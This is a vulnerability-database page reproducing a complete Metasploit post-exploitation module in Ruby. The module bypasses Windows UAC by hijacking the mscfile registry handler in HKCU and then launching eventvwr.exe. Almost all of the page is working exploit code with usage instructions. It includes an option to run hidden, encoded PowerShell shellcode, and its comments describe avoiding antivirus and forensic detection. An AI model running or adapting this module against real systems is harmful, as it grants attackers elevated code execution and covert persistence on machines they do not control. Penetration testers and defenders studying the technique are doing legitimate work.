Lucene search

K

Enigma Fileless UAC Bypass

🗓️ 09 Jan 2017 00:00:00Reported by r00t-3xp10itType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 89 Views

Enigma Fileless UAC Bypass, no file drop, CMD execution, hijack process

Show more
Code
`a  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
##  
# Exploit Title : enigma_fileless_uac_bypass.rb  
# Module Author : pedr0 Ubuntu [r00t-3xp10it]  
# Vuln discover : enigma0x3 | @mattifestation  
# Tested on : Windows 7 | Windows 8 | Windows 10  
# POC:  
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking  
#  
#  
#  
# [ DESCRIPTION ]  
# Most of the UAC bypass techniques require dropping a file to disk (for  
example, placing a DLL on disk  
# to perform a DLL hijack). The technique used in this module differs from  
the other public methods and  
# provides a useful new technique that does not rely on a privileged file  
copy, code injection, or placing  
# a traditional file on disk.  
#  
# As a normal user, you have write access to keys in HKCU, if an elevated  
process interacts with keys you  
# are able to manipulate, you can potentially interfere with actions a  
high-integrity process is attempting  
# to perform (hijack the process being started). Due to the fact that I was  
able to hijack the process, it  
# is possible to simply execute whatever malicious cmd.exe command you  
wish. This means that code execution  
# has been achieved in a high integrity process (bypassing UAC) without  
dropping a DLL or other file down to  
# the file system. This significantly reduces the risk to the attacker  
because they arenat placing a traditional  
# file on the file system that can be caught by AV/HIPS or forensically  
identified later.  
# "This module differs from 'OJ msf module' because it uses cmd.exe insted  
of powershell.exe"  
# "This module will not work if target UAC level its set to 'Always Notify'"  
#  
#  
#  
# [ MODULE OPTIONS ]  
# The session number to run this module on => set SESSION 3  
# The cmd.exe command to be executed (target) => set EXEC_COMMAND start  
firefox.exe www.househot.com  
# Check target vulnerability settings/status? => set CHECK_VULN true  
# Delete malicious registry hive keys/values? => set DEL_REGKEY true  
# Exec powershell shellcode insted of a cmd? => set USE_POWERSHELL true  
# ---  
# HINT: To deploy a powershell payload (shellcode string) we need to set  
the option  
# 'USE_POWERSHELL true' and input the base64 encoded 'shellcode' into  
'EXEC_COMMAND'  
# EXAMPLE: set USE_POWERSHELL true  
# EXAMPLE: set EXEC_COMMAND aDfSjRnGlsWlDtBsQkGftmoEdD==  
# ---  
#  
#  
#  
# [ PORT MODULE TO METASPLOIT DATABASE ]  
# Kali linux COPY TO:  
/usr/share/metasploit-framework/modules/post/windows/escalate/enigma_fileless_uac_bypass.rb  
# Ubuntu linux COPY TO:  
/opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/enigma_fileless_uac_bypass.rb  
# Manually Path Search: root@kali:~# locate modules/post/windows/escalate  
#  
#  
# [ LOAD/USE AUXILIARY ]  
# meterpreter > background  
# msf exploit(handler) > reload_all  
# msf exploit(handler) > use  
post/windows/escalate/enigma_fileless_uac_bypass  
# msf post(enigma_fileless_uac_bypass) > info  
# msf post(enigma_fileless_uac_bypass) > show options  
# msf post(enigma_fileless_uac_bypass) > show advanced options  
# msf post(enigma_fileless_uac_bypass) > set [option(s)]  
# msf post(enigma_fileless_uac_bypass) > exploit  
#  
# [ HINT ]  
# In some linux distributions postgresql needs to be started and  
# metasploit database deleted/rebuild to be abble to load module.  
# 1 - /etc/init.d/postgresql start  
# 2 - msfdb delete (optional)  
# 3 - msfdb init (optional)  
# 4 - msfconsole  
# 5 - reload_all  
##  
  
  
  
  
# ----------------------------  
# Module Dependencies/requires  
# ----------------------------  
require 'rex'  
require 'msf/core'  
require 'msf/core/post/common'  
require 'msf/core/post/windows/priv'  
require 'msf/core/post/windows/registry'  
  
  
  
  
# ----------------------------------  
# Metasploit Class name and includes  
# ----------------------------------  
class MetasploitModule < Msf::Post  
Rank = ExcellentRanking  
  
include Msf::Post::Common  
include Msf::Post::Windows::Priv  
include Msf::Post::Windows::Error  
include Msf::Post::Windows::Registry  
  
  
  
  
# -----------------------------------------  
# Building Metasploit/Armitage info GUI/CLI  
# -----------------------------------------  
def initialize(info={})  
super(update_info(info,  
'Name' => 'enigma fileless uac bypass  
[RCE]',  
'Description' => %q{  
Implementation of fileless uac  
bypass by enigma and mattifestation using cmd.exe insted of powershell.exe  
(OJ msf module). This module will create the required registry entry in the  
current useras hive, set the default value to whatever you pass via the  
EXEC_COMMAND parameter, and runs eventvwr.exe (hijacking the process being  
started to gain code execution).  
},  
'License' => UNKNOWN_LICENSE,  
'Author' =>  
[  
'Module Author: pedr0 Ubuntu  
[r00t-3xp10it]', # post-module author  
'Vuln discover : enigma0x3 |  
mattifestation', # credits  
],  
  
'Version' => '$Revision: 1.7',  
'DisclosureDate' => 'jan 8 2017',  
'Platform' => 'windows',  
'Arch' => 'x86_x64',  
'Privileged' => 'false', # thats no need for  
privilege escalation..  
'Targets' =>  
[  
# Tested againts windows 7 |  
Windows 8 | Windows 10  
[ 'Windows XP', 'Windows VISTA',  
'Windows 7', 'Windows 8', 'Windows 9', 'Windows 10' ]  
],  
'DefaultTarget' => '6', # default its to run  
againts windows 10  
'References' =>  
[  
[ 'URL', 'POC: goo.gl/XHQ6aF' ],  
[ 'URL', '  
https://github.com/r00t-3xp10it' ],  
[ 'URL', '  
https://github.com/r00t-3xp10it/msf-auxiliarys' ]  
  
  
],  
'DefaultOptions' =>  
{  
'SESSION' => '1', # Default its to  
run againts session 1  
},  
'SessionTypes' => [ 'meterpreter' ]  
  
))  
  
register_options(  
[  
OptString.new('SESSION', [ true, 'The  
session number to run this module on']),  
OptString.new('EXEC_COMMAND', [ false, 'The  
cmd command to be executed (eg start notepad.exe)']),  
OptBool.new('CHECK_VULN', [ false, 'Check  
target vulnerability status?' , false])  
], self.class)  
  
register_advanced_options(  
[  
OptBool.new('USE_POWERSHELL', [ false,  
'Execute powershell shellcode insted of a cmd command?' , false]),  
OptBool.new('DEL_REGKEY', [ false, 'Delete  
malicious registry key hive?' , false])  
], self.class)  
  
end  
  
  
  
  
# -------------------------------------------------------  
# GAIN REMOTE CODE EXCUTION BY HIJACKING EVENTVWR PROCESS  
# -------------------------------------------------------  
def ls_stage1  
  
r=''  
session = client  
vul_serve = "eventvwr.exe" # vulnerable soft to be hijacked  
exec_comm = datastore['EXEC_COMMAND'] # my cmd command to execute (OR  
powershell shellcode)  
uac_level = "ConsentPromptBehaviorAdmin" # uac level key  
comm_path = "%SystemRoot%\\System32\\cmd.exe /c" # cmd.exe %comspec% path  
regi_hive = "REG ADD  
HKCU\\Software\\Classes\\mscfile\\shell\\open\\command" # registry hive key  
to be hijacked  
psh_lpath =  
"%SystemRoot%\\System32\\WindowsPowershell\\v1.0\\powershell.exe" #  
powershell.exe %comspec% path  
psh_comma = "#{psh_lpath} -nop -wind hidden -Exec Bypass -noni -enc" #  
use_powershell advanced option command  
uac_hivek =  
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" #  
uac hive key  
# check for proper config settings enter  
# to prevent 'unset all' from deleting default options...  
if datastore['EXEC_COMMAND'] == 'nil'  
print_error("Options not configurated correctly...")  
print_warning("Please set EXEC_COMMAND option!")  
return nil  
else  
print_status("Hijacking eventvwr.exe process!")  
Rex::sleep(1.5)  
end  
  
# search in target regedit if eventvwr calls mmc.exe  
print_warning("Reading process registry hive keys...")  
Rex::sleep(1.0)  
if registry_enumkeys("HKCR\\mscfile\\shell\\open\\command")  
print_good(" exec => remote registry hive key found!")  
Rex::sleep(1.0)  
else  
# registry hive key not found, aborting module execution.  
print_warning("Hive key: HKCR\\mscfile\\shell\\open\\command (mmc.exe  
call)")  
print_error("[ABORT]: module cant find the registry hive key  
needed...")  
print_error("System does not appear to be vulnerable to the exploit  
code!")  
print_line("")  
Rex::sleep(1.0)  
return nil  
end  
  
# check target UAC settings (always notify - will abort module  
execution)  
check_success = registry_getvaldata("#{uac_hivek}","#{uac_level}")  
# a dword:2 value it means 'always notify' setting is active.  
if check_success == 2  
print_warning("Target UAC set to: #{check_success} (always notify)")  
print_error("[ABORT]: module can not work under this  
condictions...")  
print_error("Remote system its not vulnerable to the exploit code!")  
print_line("")  
Rex::sleep(1.0)  
return nil  
# a dword:nil value it means that we are running againts a  
'non-uac-system'  
elsif check_success.nil?  
print_warning("UAC DWORD DATA EMPTY (NON-UAC-SYSTEM?)")  
print_error("[ABORT]: module can not work under this  
condictions...")  
print_error("Remote system its not vulnerable to the exploit code!")  
print_line("")  
Rex::sleep(1.0)  
return nil  
else  
# all good in UAC settings :D  
print_good(" exec => Target UAC set to: #{check_success}  
(exploitable)")  
Rex::sleep(1.0)  
end  
  
#  
# chose to execute a single command in cmd.exe syntax logic  
# or to execute a shellcode(base64) string using powershell.exe  
#  
if datastore['USE_POWERSHELL'] == true  
comm_inje = "#{regi_hive} /ve /t REG_SZ /d \"#{psh_comma}  
#{exec_comm}\" /f"  
print_good(" exec => Injecting shellcode(base64) string  
(powershell.exe)")  
Rex::sleep(1.0)  
else  
comm_inje = "#{regi_hive} /ve /t REG_SZ /d \"#{comm_path}  
#{exec_comm}\" /f"  
print_good(" exec => Injecting cmd command string (cmd.exe)")  
Rex::sleep(1.0)  
end  
  
# Execute process hijacking in registry (cmd.exe OR powershell.exe)...  
# REG ADD HKCU\Software\Classes\mscfile\shell\open\command /ve /t REG_SZ  
/d "powershell.exe -nop -enc aDfSjRnGlsgVkGftmoEdD==" /f  
# REG ADD HKCU\Software\Classes\mscfile\shell\open\command /ve /t REG_SZ  
/d "c:\windows\System32\cmd.exe /c start notepad.exe" /f  
print_good(" exec => Hijacking process to gain code execution...")  
r = session.sys.process.execute("cmd.exe /c #{comm_inje}", nil, {'Hidden'  
=> true, 'Channelized' => true})  
# give a proper time to refresh regedit 'enigma0x3' :D  
Rex::sleep(4.5)  
  
# start remote service to gain code execution  
print_good(" exec => Starting eventvwr.exe native process...")  
r = session.sys.process.execute("cmd.exe /c start #{vul_serve}", nil,  
{'Hidden' => true, 'Channelized' => true})  
Rex::sleep(1.0)  
  
# close channel when done  
print_status("UAC-RCE Credits: enigma0x3 + @mattifestation")  
print_line("")  
r.channel.close  
r.close  
  
# error exception funtion  
rescue ::Exception => e  
print_error("Error: #{e.class} #{e}")  
end  
  
  
  
  
# ----------------------------------------------------  
# DELETE MALICIOUS REGISTRY ENTRY (process hijacking)  
# ----------------------------------------------------  
def ls_stage2  
  
r=''  
session = client  
reg_clean = "REG DELETE HKCU\\Software\\Classes\\mscfile /f" # registry  
hive to be clean  
# check for proper config settings enter  
# to prevent 'unset all' from deleting default options...  
if datastore['DEL_REGKEY'] == 'nil'  
print_error("Options not configurated correctly...")  
print_warning("Please set DEL_REGKEY option!")  
return nil  
else  
print_status("Revert eventvwr.exe process hijack!")  
Rex::sleep(1.5)  
end  
  
# search in target regedit if hijacking method allready exists  
print_warning("Reading process registry hive keys...")  
Rex::sleep(1.0)  
if  
registry_enumkeys("HKCU\\Software\\Classes\\mscfile\\shell\\open\\command")  
print_good(" exec => Remote registry hive key found!")  
Rex::sleep(1.0)  
else  
# registry hive key not found, aborting module execution.  
print_warning("Hive key:  
HKCU\\Software\\Classes\\mscfile\\shell\\open\\command")  
print_error("[ABORT]: module cant find the registry hive key  
needed...")  
print_error("System does not appear to be vulnerable to the exploit  
code!")  
print_line("")  
Rex::sleep(1.0)  
return nil  
end  
  
# Delete hijacking hive keys from target regedit...  
# REG DELETE HKCU\Software\Classes /f -> mscfile\shell\open\command  
print_good(" exec => Deleting HKCU hive registry keys...")  
r = session.sys.process.execute("cmd.exe /c #{reg_clean}", nil, {'Hidden'  
=> true, 'Channelized' => true})  
# give a proper time to refresh regedit  
Rex::sleep(3.0)  
  
# check if remote registry hive keys was deleted successefuly  
if  
registry_enumkeys("HKCU\\Software\\Classes\\mscfile\\shell\\open\\command")  
print_error("Module can not verify if deletion has successefully!")  
else  
print_status("Registry hive keys deleted successefuly!")  
end  
  
Rex::sleep(1.0)  
# close channel when done  
print_status("process hijack reverted to default stage!")  
print_line("")  
r.channel.close  
r.close  
  
# error exception funtion  
rescue ::Exception => e  
print_error("Error: #{e.class} #{e}")  
end  
  
  
  
  
# -------------------------------------------  
# CHECK TARGET VULNERABILITY STATUS/EXISTANCE  
# -------------------------------------------  
def ls_stage3  
  
r=''  
session = client  
vuln_soft = "eventvwr.exe" # vulnerable software name  
uac_level = "ConsentPromptBehaviorAdmin" # uac level key  
vuln_hive = "HKCR\\mscfile\\shell\\open\\command" # vulnerable hive key  
call (mmc.exe)  
vuln_key = "HKCU\\Software\\Classes\\mscfile\\shell\\open\\command" #  
vuln hijack key  
uac_hivek =  
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" #  
uac hive key  
# check for proper config settings enter  
# to prevent 'unset all' from deleting default options...  
if datastore['CHECK_VULN'] == 'nil'  
print_error("Options not configurated correctly...")  
print_warning("Please set CHECK_VULN option!")  
return nil  
else  
print_status("Checking target vulnerability details!")  
Rex::sleep(1.5)  
end  
  
print_warning("Reading process registry hive keys...")  
Rex::sleep(2.0)  
# check target registry hive/key settings (mmc.exe call)  
if registry_enumkeys("HKCR\\mscfile\\shell\\open\\command")  
report_on = "EXPLOITABLE"  
else  
vuln_hive = "NOT FOUND"  
report_on = "NOT EXPLOITABLE"  
end  
  
# check target registry hive/key settings (hijacking key)  
if  
registry_enumkeys("HKCU\\Software\\Classes\\mscfile\\shell\\open\\command")  
report_tw = "HIJACK HIVE ACTIVE"  
else  
vuln_key = "NOT FOUND"  
report_tw = "HIJACK HIVE NOT PRESENT"  
end  
  
# check target registry hive/key settings (UAC level settings)  
check_uac = registry_getvaldata("#{uac_hivek}","#{uac_level}")  
# a dword:2 value it means 'always notify' setting is active.  
if check_uac == 2  
report_level = "ALWAYS NOTIFY (NOT EXPLOITABLE)"  
# a dword:nil value it means that we are running againts a  
'non-uac-system'  
elsif check_uac.nil?  
report_level = "DWORD DATA EMPTY (NON-UAC-SYSTEM?)"  
else  
# all good in UAC settings :D  
report_level = "#{check_uac} (EXPLOITABLE)"  
end  
  
print_line("")  
# display target registry settings to user...  
# i hope you are smart enouth to recognise a vulnerable output :D  
print_line("VULNERABLE_SOFT : #{vuln_soft}")  
print_line(" UAC_LEVEL : #{report_level}")  
print_line(" VULN_HIVE : #{vuln_hive}")  
print_line(" KEY_INFO : #{report_on}")  
print_line("")  
print_line(" HIJACK_HIVE : #{vuln_key}")  
print_line(" KEY_INFO : #{report_tw}")  
print_line("")  
Rex::sleep(1.0)  
end  
  
  
  
  
# ------------------------------------------------  
# MAIN DISPLAY WINDOWS (ALL MODULES - def run)  
# Running sellected modules against session target  
# ------------------------------------------------  
def run  
session = client  
  
# Variable declarations (msf API calls)  
oscheck = client.fs.file.expand_path("%OS%")  
sysnfo = session.sys.config.sysinfo  
runtor = client.sys.config.getuid  
runsession = client.session_host  
directory = client.fs.dir.pwd  
  
  
  
# Print banner and scan results on screen  
print_line(" +----------------------------------------------+")  
print_line(" | enigma fileless UAC bypass command execution |")  
print_line(" | Author : r00t-3xp10it |")  
print_line(" +----------------------------------------------+")  
print_line("")  
print_line(" Running on session : #{datastore['SESSION']}")  
print_line(" Computer : #{sysnfo['Computer']}")  
print_line(" Operative System : #{sysnfo['OS']}")  
print_line(" Target IP addr : #{runsession}")  
print_line(" Payload directory : #{directory}")  
print_line(" Client UID : #{runtor}")  
print_line("")  
print_line("")  
  
  
#  
# the 'def check()' funtion that rapid7 requires to accept new modules.  
# Guidelines for Accepting Modules and Enhancements:  
https://goo.gl/OQ6HEE  
#  
# check for proper operative system (windows-not-wine)  
if not oscheck == "Windows_NT"  
print_error("[ ABORT ]: This module only works againts windows  
systems")  
return nil  
end  
# check for proper session (meterpreter)  
# the non-return of sysinfo command reveals  
# that we are not on a meterpreter session!  
if not sysinfo.nil?  
print_status("Running module against: #{sysnfo['Computer']}")  
else  
print_error("[ ABORT ]: This module only works against meterpreter  
sessions!")  
return nil  
end  
# elevate session privileges befor runing options  
client.sys.config.getprivs.each do |priv|  
end  
  
  
# ------------------------------------  
# Selected settings to run  
# ------------------------------------  
if datastore['EXEC_COMMAND']  
ls_stage1  
end  
  
if datastore['DEL_REGKEY']  
ls_stage2  
end  
  
if datastore['CHECK_VULN']  
ls_stage3  
end  
end  
end  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo